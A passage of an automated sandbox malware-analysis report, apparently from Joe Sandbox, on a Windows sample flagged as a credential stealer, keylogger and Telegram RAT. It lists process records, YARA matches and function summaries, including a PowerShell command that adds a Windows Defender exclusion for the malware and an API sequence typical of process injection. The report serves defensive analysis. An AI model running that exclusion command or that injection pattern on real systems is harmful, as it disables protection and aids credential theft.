Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe"
Imagebase:	0x870000
File size:	704'000 bytes
MD5 hash:	42F2CE52A57E0D72EAC297A532354E42
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1738966608.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1738966608.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1738966608.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1738966608.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	04:33:07
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe"
Imagebase:	0xe00000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	04:33:07
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	04:33:07
Start date:	26/09/2024
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe"
Imagebase:	0x7d0000
File size:	704'000 bytes
MD5 hash:	42F2CE52A57E0D72EAC297A532354E42
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.4171196895.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.4169573077.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000004.00000002.4169573077.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.4169573077.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.4169573077.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.4171196895.0000000002CC8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	04:33:09
Start date:	26/09/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff693ab0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	11.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	150
Total number of Limit Nodes:	9

Executed Functions

Function 052D91C0 Relevance: .2, Instructions: 191COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1740737302.00000000052D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52d0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64c618241086a8bdecd806fe26a63f3549bd67f6212907a2c2e8851c9229a946
Instruction ID: 53e83b8cbdeec7f20e2f7f10d9be3904b7c449de4071fe0699c7dc75019fe910
Opcode Fuzzy Hash: 64c618241086a8bdecd806fe26a63f3549bd67f6212907a2c2e8851c9229a946
Instruction Fuzzy Hash: 1C61C770D29218CBDB58CFA6C8446EDFBBBBF89300F10D069E419AB255DB745A85CF60

Function 052DB783 Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1740737302.00000000052D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52d0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e7a4657e4571f4b1ad61cfdaf18d5da6a7bb4ddd97307493b388157ec650b66
Instruction ID: 77a9d06f1d55b3dd251ce0aa6feb4fa5f72cda5239bd2919cfa0b3b0695c5b22
Opcode Fuzzy Hash: 7e7a4657e4571f4b1ad61cfdaf18d5da6a7bb4ddd97307493b388157ec650b66
Instruction Fuzzy Hash: D9511C74A26219CFCB10CF58C6A0AADFBF6FF4A311F56D595E0099B211C770A880CF61

Function 052D91B0 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1740737302.00000000052D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52d0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c09b1952a7e8f2ea5e5501754571d5ae699d38814754c4dfedb4a5822a9f7dc
Instruction ID: 58a9b27cd4d17cfe317c7138145dd7fed14019849ce888b04ba3b1fa43d96221
Opcode Fuzzy Hash: 3c09b1952a7e8f2ea5e5501754571d5ae699d38814754c4dfedb4a5822a9f7dc
Instruction Fuzzy Hash: 1541F670D186188BDB58CFAAC8446EEFBFBBF89300F14D06AD859A7255DB704A458F60

Function 052D1BD0 Relevance: 9.1, Strings: 7, Instructions: 365
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 052D1F7E
4'^q, xrefs: 052D1FC4
4'^q, xrefs: 052D1FE7
4'^q, xrefs: 052D1F15
4'^q, xrefs: 052D1FA1
4'^q, xrefs: 052D1F5B
4'^q, xrefs: 052D1F38

Memory Dump Source

Source File: 00000000.00000002.1740737302.00000000052D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52d0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
API String ID: 0-3435395042
Opcode ID: d755fea8eb1f620acf20ea7ade00731d0d80925ddeadfdc6830a6aaee04a5992
Instruction ID: 152e7ff73b6be0de5d1f579091bf866c41ed459c5009c6512cb1d4e0c2f67201
Opcode Fuzzy Hash: d755fea8eb1f620acf20ea7ade00731d0d80925ddeadfdc6830a6aaee04a5992
Instruction Fuzzy Hash: CEE1A135B002059FDB05EB79E4947ADBBB2FF88304F008568E506EB395DF359986CBA1

Function 0128D138 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0128D1B6
GetCurrentThread.KERNEL32 ref: 0128D1F3
GetCurrentProcess.KERNEL32 ref: 0128D230
GetCurrentThreadId.KERNEL32 ref: 0128D289

Memory Dump Source

Source File: 00000000.00000002.1736550354.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1280000_SecuriteInfo.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 17557f539599b7521cfe8b83e267d24b0a3e789f0e8e432cfb25562ad80ec2e5
Instruction ID: 3dde0820393754465332c9ba06c89ff6cfa7d29022b39eb6805c21452510f19a
Opcode Fuzzy Hash: 17557f539599b7521cfe8b83e267d24b0a3e789f0e8e432cfb25562ad80ec2e5
Instruction Fuzzy Hash: D45178B0D013498FDB18EFAAD548B9EBBF1EF88314F208559E509A7390D734A944CF65

Function 07832D9D Relevance: 1.7, APIs: 1, Instructions: 245
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07832FDE

Memory Dump Source

Source File: 00000000.00000002.1743750170.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7830000_SecuriteInfo.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: af39c30fb010744db7ad12480ce5fe6162a71b4f58adce12f822dbf79bbcd2e8
Instruction ID: 538cd3429fa6dfc801e0dcdb94e2ca34d3f314df1e1ce2fea4fd7cc82a8ac6b7
Opcode Fuzzy Hash: af39c30fb010744db7ad12480ce5fe6162a71b4f58adce12f822dbf79bbcd2e8
Instruction Fuzzy Hash: 36915DB1D0021ADFDB20DFA8C8417EDBBB2BF58314F14856AD819E7240DB759985CF92

Function 07832DA8 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07832FDE

Memory Dump Source

Source File: 00000000.00000002.1743750170.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7830000_SecuriteInfo.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 35188b495a6d9c83db4e741ee4587ad02916801ddd26c13def0e59d9c927740d
Instruction ID: 11da24bc2266ea3c68b34a270a4564e36963767d478f49152ab31f2feffe4aba
Opcode Fuzzy Hash: 35188b495a6d9c83db4e741ee4587ad02916801ddd26c13def0e59d9c927740d
Instruction Fuzzy Hash: 5D916CB1D0021ADFDB20DFA8C841BEDBBB2BF58314F148569D809E7240DB759985CF92

Function 01284248 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 012859C9

Memory Dump Source

Source File: 00000000.00000002.1736550354.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1280000_SecuriteInfo.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 2cfcb030ef735c473d76b7cbdc57f983497afbca27c217873804286030d37124
Instruction ID: b701e43e5d204ffca769c4e34b3b78a5f637ee57fe4f464cba282a9d95b5457c
Opcode Fuzzy Hash: 2cfcb030ef735c473d76b7cbdc57f983497afbca27c217873804286030d37124
Instruction Fuzzy Hash: 5D41DFB0C10719CADB24DFAAC884ADEBBF5FF49304F20806AD509AB255DB756946CF90

Function 01285917 Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 012859C9

Memory Dump Source

Source File: 00000000.00000002.1736550354.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1280000_SecuriteInfo.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: ef268e56e67b1aa1fc46bcab0de13a0245049d38c10341ff70a5a7869ea42057
Instruction ID: a7d7ea0e12e8f97fd2e92a0fdccd47c2b294bb54fd5123a821e6a522629a1e3e
Opcode Fuzzy Hash: ef268e56e67b1aa1fc46bcab0de13a0245049d38c10341ff70a5a7869ea42057
Instruction Fuzzy Hash: 2941CEB0C10719CEDB24DFAAC884ADEBBB5BF49304F20806AD509AB255DB756946CF90

Function 07832B18 Relevance: 1.6, APIs: 1, Instructions: 72
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07832BB0

Memory Dump Source

Source File: 00000000.00000002.1743750170.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7830000_SecuriteInfo.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: d08a3ac9fe40b63e8aa7d3413beb5c303de869eb4e190f4e59dbb46d590f6b9e
Instruction ID: 0600eafc1c6109fd8d2d9d0d76251bed9345e825a4b496c85c35431f34fc1b8c
Opcode Fuzzy Hash: d08a3ac9fe40b63e8aa7d3413beb5c303de869eb4e190f4e59dbb46d590f6b9e
Instruction Fuzzy Hash: 6E2127B5900319DFCB10DFA9C885BDEBBF1FF48310F10842AE959A7240D7789955DBA4

Function 07832B20 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07832BB0

Memory Dump Source

Source File: 00000000.00000002.1743750170.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7830000_SecuriteInfo.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 5a8b06ff9026545f3fe5122ebda1e7258ba664d48bbd2623cce7c5c2fa71fafd
Instruction ID: 98d1bb6a7423a2c46f4ffff2384c6586a488cdcfea43d31d8f79866185ec28d8
Opcode Fuzzy Hash: 5a8b06ff9026545f3fe5122ebda1e7258ba664d48bbd2623cce7c5c2fa71fafd
Instruction Fuzzy Hash: 8F2125B1900319DFCB10DFAAC885BDEBBF5FF88310F10842AE959A7240C7789954CBA4

Function 07832980 Relevance: 1.6, APIs: 1, Instructions: 68
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07832A06

Memory Dump Source

Source File: 00000000.00000002.1743750170.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7830000_SecuriteInfo.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: f646e7538123875eed9f9146e9dbd78af16b461271aa02c3130827d6396e1c71
Instruction ID: 77ec1eb3cecc116e1ab82668a1302a5738c9b12f0631b8cee7a1b05d7e81b246
Opcode Fuzzy Hash: f646e7538123875eed9f9146e9dbd78af16b461271aa02c3130827d6396e1c71
Instruction Fuzzy Hash: 562159B19003098FDB10DFAAC8857EEBBF5EB48320F50842AD559A7241D7789945CBA4

Function 07832C09 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07832C90

Memory Dump Source

Source File: 00000000.00000002.1743750170.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7830000_SecuriteInfo.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: cf8e9d5241132ab4bac1b70431edc4f485932692e9e7516cfee95c5480aec55f
Instruction ID: 8f55296a1407b7929561080604b8d84843a0a9f6a7c3c16ff693bd01419f4bd6
Opcode Fuzzy Hash: cf8e9d5241132ab4bac1b70431edc4f485932692e9e7516cfee95c5480aec55f
Instruction Fuzzy Hash: 332128B1D002499FCB10DFAAC984BDEBBF5FF48320F50842AE959A7250D7359945DBA0

Function 07835699 Relevance: 1.6, APIs: 1, Instructions: 64
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 07835665

Memory Dump Source

Source File: 00000000.00000002.1743750170.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7830000_SecuriteInfo.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 8cdd6a2689576ecdcd21462e0413471c112bf1c0cbda2221405602055f5ef58b
Instruction ID: ae08d28b877ebc49653b56abb42f39e0c5492a58b9996a66c3d453f3b5f19e4c
Opcode Fuzzy Hash: 8cdd6a2689576ecdcd21462e0413471c112bf1c0cbda2221405602055f5ef58b
Instruction Fuzzy Hash: 9C11CDB2A052298BDB20EF68D905BEEBBF0AF44310F118459C505FB280DB786A14CBE0

Function 07832C10 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07832C90

Memory Dump Source

Source File: 00000000.00000002.1743750170.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7830000_SecuriteInfo.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: b24ca63350402f488eb896efaf3210dca9f1443dfcaefdd30420b7c006d75f81
Instruction ID: 8a29c2a8dcb2bc3f48f734c6b20724b52e36f73edff200fa5fe0b100415bea7b
Opcode Fuzzy Hash: b24ca63350402f488eb896efaf3210dca9f1443dfcaefdd30420b7c006d75f81
Instruction Fuzzy Hash: AA2139B1C003499FCB10DFAAC885ADEFBF5FF48320F50842AE559A7240D7359945DBA5

Function 07832A58 Relevance: 1.6, APIs: 1, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07832ACE

Memory Dump Source

Source File: 00000000.00000002.1743750170.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7830000_SecuriteInfo.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 41d3f59fcf9a78634227797f2678cbe408dbad6cc37ee4238cbc1f146e8a8b0b
Instruction ID: 657ddc92961747d26ef8eb6a89dd8f27e3f53ec0f696ca9203833a7f4af3cac5
Opcode Fuzzy Hash: 41d3f59fcf9a78634227797f2678cbe408dbad6cc37ee4238cbc1f146e8a8b0b
Instruction Fuzzy Hash: BB218CB69002099FCB20DF9AD844ADFFBF5FF98324F10841AE529A7250C7359554DFA0

Function 07832988 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07832A06

Memory Dump Source

Source File: 00000000.00000002.1743750170.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7830000_SecuriteInfo.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 150da14dc985b441383339d60fe201f0e01916e31d5633e6998f060fe17d94f9
Instruction ID: c932da00593c980e1903d58377f1351e58b91dc88e57c8b0506c9f5bc7705b33
Opcode Fuzzy Hash: 150da14dc985b441383339d60fe201f0e01916e31d5633e6998f060fe17d94f9
Instruction Fuzzy Hash: E3213AB19003098FDB10DFAAC4857EEBBF4EF48320F108429D559A7241C7789945CFA5

Function 0128D380 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0128D407

Memory Dump Source

Source File: 00000000.00000002.1736550354.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1280000_SecuriteInfo.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 62df117d7e83ca5a6acd5d9bb6963e7b4fe004962fe83c6235c26c92c85f3dcf
Instruction ID: 6f2d3fbad52bdcf918057da711ebe7794f8e8420d55a399bf7580aa6ab1aaa81
Opcode Fuzzy Hash: 62df117d7e83ca5a6acd5d9bb6963e7b4fe004962fe83c6235c26c92c85f3dcf
Instruction Fuzzy Hash: 6E21E2B59002099FDB10CFAAD884ADEBFF8EB48320F14801AE918A3350D375A944CFA0

Function 0128B363 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0128B3DE

Memory Dump Source

Source File: 00000000.00000002.1736550354.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1280000_SecuriteInfo.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: aff447587d23a12fe991c35a6626af87a4692eeb9a9fe0c1d219afb241729662
Instruction ID: dbe55142e8c27613e182bead00fd8288992cffb8215e390803ae6036139cf46c
Opcode Fuzzy Hash: aff447587d23a12fe991c35a6626af87a4692eeb9a9fe0c1d219afb241729662
Instruction Fuzzy Hash: 621150B58043898FDB10DF9AC884A9EFFF4EF88310F10845ED859A7250C339A545CFA1

Function 07832A60 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07832ACE

Memory Dump Source

Source File: 00000000.00000002.1743750170.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7830000_SecuriteInfo.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 418d849530391f4ecab570636fe83928d9f8c162e7a9996465a57998d90146dd
Instruction ID: 662a44e7cb0c854711ce737277da26e670ade0f71a5182a857c0df72f2fd5ecc
Opcode Fuzzy Hash: 418d849530391f4ecab570636fe83928d9f8c162e7a9996465a57998d90146dd
Instruction Fuzzy Hash: FC1137B19002499FCB10DFAAC845ADFBFF5EF88320F20841AE519A7250C775A954DFA0

Function 078328D2 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0783293A

Memory Dump Source

Source File: 00000000.00000002.1743750170.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7830000_SecuriteInfo.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: dbea2c80fb007342ad1c4b91d560d53b0ac8598826f0b94f3cf5af9ed540b882
Instruction ID: 977a440efc63820173b99903698e5ce038656040e6de79b894bf56067b67e3fa
Opcode Fuzzy Hash: dbea2c80fb007342ad1c4b91d560d53b0ac8598826f0b94f3cf5af9ed540b882
Instruction Fuzzy Hash: FD1155B59002098FCB20DFAAC844BEEFBF5EB88324F20841AD519A7240CA35A945CB94

Function 078328D8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0783293A

Memory Dump Source

Source File: 00000000.00000002.1743750170.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7830000_SecuriteInfo.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: f325b9d34266b79431267d801ecabd2d86e08af6c4cd8b6072f34b9d2cfddda1
Instruction ID: 9945940351835ad3e1aabc2fadb55a7e485c8812b675abef00090ecb776edae1
Opcode Fuzzy Hash: f325b9d34266b79431267d801ecabd2d86e08af6c4cd8b6072f34b9d2cfddda1
Instruction Fuzzy Hash: A61136B19003498FCB10DFAAC845BEEFBF5EB88324F20841AD519A7240CB75A945CBA4

Function 0128B378 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0128B3DE

Memory Dump Source

Source File: 00000000.00000002.1736550354.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1280000_SecuriteInfo.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 88409ba40bef91f576845f5c818e234aae9009b0adc6e93124121e0e76373448
Instruction ID: 47eb3bf6e897ba0959381d2e7c411609bc6f7f307c6d319c9ead311ec200ed2e
Opcode Fuzzy Hash: 88409ba40bef91f576845f5c818e234aae9009b0adc6e93124121e0e76373448
Instruction Fuzzy Hash: 4E11E0B5C0034A8FDB14DF9AD844ADEFBF4EF88324F10841AD929A7650D375A545CFA1

Function 078313A8 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 07835665

Memory Dump Source

Source File: 00000000.00000002.1743750170.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7830000_SecuriteInfo.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 6dfdc56cd98e53697cea387f2eb11a36f5e8d44e4777929dcc12f30c09d463fe
Instruction ID: d3847c5c3c435a2325687ccc1c32722a9853110885dd2a6b552f35456c2dc7ad
Opcode Fuzzy Hash: 6dfdc56cd98e53697cea387f2eb11a36f5e8d44e4777929dcc12f30c09d463fe
Instruction Fuzzy Hash: 4A1106B5804349DFCB10DF9AC885BDEBBF8EB58310F108419E519A7200D375A954CFA5

Function 07835607 Relevance: 1.5, APIs: 1, Instructions: 42windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 07835665

Memory Dump Source

Source File: 00000000.00000002.1743750170.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7830000_SecuriteInfo.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 2c8ab840c8489861b97dde69c160b4c3e13feecfbb63fc44cbb0c4e91a26d9d5
Instruction ID: 7ddeefe9577ab1a87e4b9252e2bd060d662c3e1713a8bde54159410bec05738e
Opcode Fuzzy Hash: 2c8ab840c8489861b97dde69c160b4c3e13feecfbb63fc44cbb0c4e91a26d9d5
Instruction Fuzzy Hash: DD1112B5800349DFCB10DF9AC989BDEBBF8EB48320F20880AD519A3200D375A944CFA0

Function 052D4B78 Relevance: 1.4, Strings: 1, Instructions: 154COMMON

Download Yara Rule

Strings

Te^q, xrefs: 052D68F1

Memory Dump Source

Source File: 00000000.00000002.1740737302.00000000052D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52d0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: baa8067597bb8877a15518856579a8fca1b9f1ba47fd544084d99b419152e252
Instruction ID: d105ca39c6fa3940af7899c781cea1387c87f0559c7f096e0a4fac8ea72112ff
Opcode Fuzzy Hash: baa8067597bb8877a15518856579a8fca1b9f1ba47fd544084d99b419152e252
Instruction Fuzzy Hash: 1751A031B102158FCB14EB79D8889BEBBF7EFC8310B158929E459DB391EB309D0587A0

Function 052DC090 Relevance: 1.4, Strings: 1, Instructions: 134COMMON

Download Yara Rule

Strings

Te^q, xrefs: 052DC10C

Memory Dump Source

Source File: 00000000.00000002.1740737302.00000000052D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52d0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: fa60d59587e2bc8354b5d1e39dfed8c093e42f6bd3ffc2026739594fc4dc7e92
Instruction ID: ce6e05dce1caf07f82dd7e7bfd7506a12559af9c716642699d1397ec87f410e7
Opcode Fuzzy Hash: fa60d59587e2bc8354b5d1e39dfed8c093e42f6bd3ffc2026739594fc4dc7e92
Instruction Fuzzy Hash: 9551B574E29218CBDB08CFAAC8946ADFBF6AF89300F10902AD409BB355DB705D45CB60

